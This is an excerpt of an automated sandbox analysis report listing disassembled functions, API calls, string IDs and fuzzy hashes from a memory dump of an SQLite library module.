                                                                                                                                            • API String ID: 1894464702-0
                                                                                                                                            • Opcode ID: 6c4143b63593bf9ad8a946237f42ef24afd1bc7d5de4cbacf81ece55ffcc6fe2
                                                                                                                                            • Instruction ID: 9ff93e042b182cdcff4ebbe447dec40cdedfb1941d05b425af29d4af7ad67ad7
                                                                                                                                            • Opcode Fuzzy Hash: 6c4143b63593bf9ad8a946237f42ef24afd1bc7d5de4cbacf81ece55ffcc6fe2
                                                                                                                                            • Instruction Fuzzy Hash: 47315274B046428BEB14DFBAD4C061AB7F5BFE9318B25C46DD848CB319EB31D8818B85
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1B09D
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B10F
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B134
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B165
                                                                                                                                            • memcmp.MSVCRT ref: 61E1B191
                                                                                                                                            Similarity
                                                                                                                                            • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 40721531-0
                                                                                                                                            • Opcode ID: aab163ae88a6b47f64915cecefa7d16a99da593be04877be4fd492136e5166d2
                                                                                                                                            • Instruction ID: 34956e3a23004624bfcf072aa5bc559f41bff17cb2ac7b56278acc3f98de0b10
                                                                                                                                            • Opcode Fuzzy Hash: aab163ae88a6b47f64915cecefa7d16a99da593be04877be4fd492136e5166d2
                                                                                                                                            • Instruction Fuzzy Hash: CD313E71F082458BE7049FA9C58235ABBF5FFC8748F26C42DE8488B349D775D8468B52
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_log.SQLITE3 ref: 61E2821D
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E2832F), ref: 61E28231
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E2832F), ref: 61E28259
                                                                                                                                            • sqlite3_log.SQLITE3 ref: 61E28277
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E282AD
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1015584638-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E42EC6
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E42ED1
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E42FAD
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E42FB8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1477753154-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_initialize.SQLITE3 ref: 61E3320A
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E33222
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E33245
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E33289
                                                                                                                                            • sqlite3_memory_used.SQLITE3 ref: 61E3328E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2853221962-0
                                                                                                                                            APIs
                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32 ref: 61E84E09
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E84E1A
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 61E84E22
                                                                                                                                            • GetTickCount.KERNEL32 ref: 61E84E2A
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,61E01439), ref: 61E84E39
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1445889803-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1431A), ref: 61E0A93C
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1431A), ref: 61E0A978
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1431A), ref: 61E0A991
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1431A), ref: 61E0A9A4
                                                                                                                                            • sqlite3_free.SQLITE3(?,?,?,61E1431A), ref: 61E0A9AC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 251237202-0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_win32_is_nt
                                                                                                                                            • String ID: winAccess
                                                                                                                                            • API String ID: 2284118020-3605117275
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1A271
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_realloc.SQLITE3 ref: 61E1A2BF
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1A2D5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                                                                            • String ID: d
                                                                                                                                            • API String ID: 211589378-2564639436
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_value_int$sqlite3_result_blob
                                                                                                                                            • String ID: 8
                                                                                                                                            • API String ID: 2918918774-4194326291
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 61E28068: sqlite3_log.SQLITE3(?,?,?,?,?,61E2811B), ref: 61E280A3
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E281A7
                                                                                                                                            • sqlite3_value_text.SQLITE3 ref: 61E281C0
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E281DA
                                                                                                                                              • Part of subcall function 61E25809: sqlite3_log.SQLITE3 ref: 61E25832
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                                                                                                                            • String ID: out of memory
                                                                                                                                            • API String ID: 645246966-2599737071
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                                                            • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                                                                                                                            • API String ID: 1646373207-328863460
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1EB90
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E1ECA7
                                                                                                                                            • sqlite3_result_error_code.SQLITE3 ref: 61E1EDCA
                                                                                                                                            • sqlite3_result_double.SQLITE3 ref: 61E1EDDF
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4229029058-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2374424446-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E1FC7B
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_value_dup.SQLITE3 ref: 61E1FCD2
                                                                                                                                            • sqlite3_result_error_nomem.SQLITE3 ref: 61E1FD07
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_initializesqlite3_mallocsqlite3_result_error_nomemsqlite3_value_dup
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 405757302-0
                                                                                                                                            • Opcode ID: 68d572a4c6402f453158b51b8cf2fcca59753bad2e2d850b2e81e9224d04b467
                                                                                                                                            • Instruction ID: 4fde834cf7d313903c13ca125cde073186d7b4735a313237e85520166a8b19a9
                                                                                                                                            • Opcode Fuzzy Hash: 68d572a4c6402f453158b51b8cf2fcca59753bad2e2d850b2e81e9224d04b467
                                                                                                                                            • Instruction Fuzzy Hash: 3A31F5B5E042198FCB00DFA9D48199EBBF0FF88314F55846AE858AB314D735E955CFA0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_initialize.SQLITE3 ref: 61E36EBA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E36EDA
                                                                                                                                            • sqlite3_vfs_find.SQLITE3 ref: 61E36F19
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E37018
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 321126751-0
                                                                                                                                            • Opcode ID: d6a461f65a62ae150a46f75019947c5b19758ea2025f1891783cf6a8eca7e6e5
                                                                                                                                            • Instruction ID: 3a4c2375905abddff43da70767d102b94ae39431892a66ef335508345db4bc7f
                                                                                                                                            • Opcode Fuzzy Hash: d6a461f65a62ae150a46f75019947c5b19758ea2025f1891783cf6a8eca7e6e5
                                                                                                                                            • Instruction Fuzzy Hash: 7A414A3485C2E88EC7268B3885407D97FF0DF9A708F1988DED4C48B352C636C689CB51
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3596987688-0
                                                                                                                                            • Opcode ID: f031563807f16e2c612ab855e5c9196a1609a28ebaec0794fd828fd89ef474f6
                                                                                                                                            • Instruction ID: bad303952f1f456d16a87834cf4a3924523d4797ea5acfcc842eb63110c7c1b7
                                                                                                                                            • Opcode Fuzzy Hash: f031563807f16e2c612ab855e5c9196a1609a28ebaec0794fd828fd89ef474f6
                                                                                                                                            • Instruction Fuzzy Hash: 2F31F2B1A087069FC700DF69C88169EBBF4BB88364F24C92EE4A8D7390D774D9418F91
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_win32_is_nt.SQLITE3 ref: 61E22A8A
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E22B22
                                                                                                                                            • sqlite3_snprintf.SQLITE3 ref: 61E22B42
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E22B4A
                                                                                                                                              • Part of subcall function 61E12FAA: sqlite3_free.SQLITE3 ref: 61E13050
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4082161338-0
                                                                                                                                            • Opcode ID: 0eaa140a88e282367239eb04aebcd7bcd73a2167832a8ce833be5fee5dc7ea8d
                                                                                                                                            • Instruction ID: 1545aa548982d847fda2b20210b0eda85ef1c1096dd86b25b887c858bf0cbe94
                                                                                                                                            • Opcode Fuzzy Hash: 0eaa140a88e282367239eb04aebcd7bcd73a2167832a8ce833be5fee5dc7ea8d
                                                                                                                                            • Instruction Fuzzy Hash: EB31AFB09183469BD700AFA9C45475EBBF4BB89749F20C81EE4989B340D779C545CF92
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_malloc.SQLITE3 ref: 61E19BB9
                                                                                                                                              • Part of subcall function 61E17EE8: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17BC9,?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17EF0
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E19C01
                                                                                                                                            • sqlite3_stricmp.SQLITE3 ref: 61E19C28
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E19C56
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2308590742-0
                                                                                                                                            • Opcode ID: 34db3af258634af25f41eab726fcf2222893ef0bc47f478563414d6182194d53
                                                                                                                                            • Instruction ID: f2bc3e0c893ca387c9fb73a2d58c7151adc9fed3e59da9fee5f15724ab28e8c6
                                                                                                                                            • Opcode Fuzzy Hash: 34db3af258634af25f41eab726fcf2222893ef0bc47f478563414d6182194d53
                                                                                                                                            • Instruction Fuzzy Hash: 9821C07170C2418BE709CEA9858275B7BEAEFC5318F39C468DCD88B349C775D8428B51
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E141A2
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E141F9
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E14216
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3(?,?,?,?,-00000001,?,61E142BE), ref: 61E1423D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1477753154-0
                                                                                                                                            • Opcode ID: e4703dfb88fae64b46f605277e852d05ace32d213e893c00f8887850450c2fcc
                                                                                                                                            • Instruction ID: 84c292680c0d9c064b51162814f81ed37a2395bc54ecc127b2c643f1ef19c8a5
                                                                                                                                            • Opcode Fuzzy Hash: e4703dfb88fae64b46f605277e852d05ace32d213e893c00f8887850450c2fcc
                                                                                                                                            • Instruction Fuzzy Hash: F9116771B98A418FCF00AFA8C69164577F5FB8630CB24882FE944CB324E739D894CB52
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_stricmpsqlite3_value_text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3779612131-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E137A3
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E137F1
                                                                                                                                              • Part of subcall function 61E1020F: sqlite3_mutex_enter.SQLITE3 ref: 61E1024E
                                                                                                                                              • Part of subcall function 61E1020F: sqlite3_mutex_leave.SQLITE3 ref: 61E102F6
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E13815
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E13836
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1477753154-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __dllonexit_lock_onexit_unlock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 209411981-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C869
                                                                                                                                              • Part of subcall function 61E0A1EF: sqlite3_free.SQLITE3 ref: 61E0A210
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C87C
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C85E
                                                                                                                                              • Part of subcall function 61E09B3D: sqlite3_mutex_enter.SQLITE3 ref: 61E09B5C
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E0C8AA
                                                                                                                                              • Part of subcall function 61E0A386: sqlite3_free.SQLITE3 ref: 61E0A397
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_free$sqlite3_mutex_enter
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3930042888-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_aggregate_context.SQLITE3 ref: 61E1E82E
                                                                                                                                            • sqlite3_result_error.SQLITE3 ref: 61E1E85E
                                                                                                                                            • sqlite3_result_double.SQLITE3 ref: 61E1E874
                                                                                                                                            • sqlite3_result_int64.SQLITE3 ref: 61E1E88C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3779139978-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_initialize.SQLITE3 ref: 61E17D52
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E179B6
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21778), ref: 61E179EA
                                                                                                                                              • Part of subcall function 61E1797F: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1DEFC), ref: 61E17D35
                                                                                                                                            • sqlite3_mutex_enter.SQLITE3 ref: 61E17D6A
                                                                                                                                            • strcmp.MSVCRT ref: 61E17D87
                                                                                                                                            • sqlite3_mutex_leave.SQLITE3 ref: 61E17D98
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializestrcmp
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2933023327-0
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17E71
                                                                                                                                              • Part of subcall function 61E17DDE: sqlite3_initialize.SQLITE3(?,?,61E17E76), ref: 61E17DE9
                                                                                                                                              • Part of subcall function 61E17DDE: sqlite3_mutex_enter.SQLITE3(?,?,61E17E76), ref: 61E17E01
                                                                                                                                              • Part of subcall function 61E17DDE: sqlite3_mutex_leave.SQLITE3(?), ref: 61E17E33
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17E85
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17E99
                                                                                                                                            • sqlite3_vfs_register.SQLITE3 ref: 61E17EAD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_vfs_register$sqlite3_initializesqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2202970011-0
                                                                                                                                            • Opcode ID: 116c111f975c62758e71a20b046672a5a788bd6d92f6ce3e82883bd03000cb47
                                                                                                                                            • Instruction ID: e535d16afac83e4927456be973af1f03fa588a6ee2b19afb015943bb6a7a0ce6
                                                                                                                                            • Opcode Fuzzy Hash: 116c111f975c62758e71a20b046672a5a788bd6d92f6ce3e82883bd03000cb47
                                                                                                                                            • Instruction Fuzzy Hash: 1DF03AB19182489BD3406F64C10732FBAE5AFC6B08F71C81CD089872C4C775C4419B53
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                            • String ID: @6a
                                                                                                                                            • API String ID: 632333372-3141242769
                                                                                                                                            • Opcode ID: 27c47573da3e38849dbf6bdbf2e8815780ec0866abec940012f18dbe2e480e62
                                                                                                                                            • Instruction ID: c7bfb48737037a274caa4d5e8f79f19cfc5c533abebaddf0c36844fd74782d27
                                                                                                                                            • Opcode Fuzzy Hash: 27c47573da3e38849dbf6bdbf2e8815780ec0866abec940012f18dbe2e480e62
                                                                                                                                            • Instruction Fuzzy Hash: 15513870A9A645DFDF80CF2CC14664D77A2F78B764F29C01AEC488B3A8D734D8858B61
                                                                                                                                            APIs
                                                                                                                                            • sqlite3_win32_is_nt.SQLITE3 ref: 61E265E5
                                                                                                                                              • Part of subcall function 61E172E3: InterlockedCompareExchange.KERNEL32 ref: 61E17303
                                                                                                                                              • Part of subcall function 61E172E3: InterlockedCompareExchange.KERNEL32 ref: 61E1734A
                                                                                                                                              • Part of subcall function 61E172E3: InterlockedCompareExchange.KERNEL32 ref: 61E1736A
                                                                                                                                              • Part of subcall function 61E1726D: sqlite3_win32_sleep.SQLITE3 ref: 61E172C5
                                                                                                                                            • sqlite3_free.SQLITE3 ref: 61E266B0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000B.00000002.2864809456.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_11_2_61e00000_ast.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CompareExchangeInterlocked$sqlite3_freesqlite3_win32_is_ntsqlite3_win32_sleep
                                                                                                                                            • String ID: winDelete
                                                                                                                                            • API String ID: 3336177498-3936022152
                                                                                                                                            • Opcode ID: 38af854695d88063867f47c327f837f6ef6e7ecf0c5df9d1445217bf7ec35edf
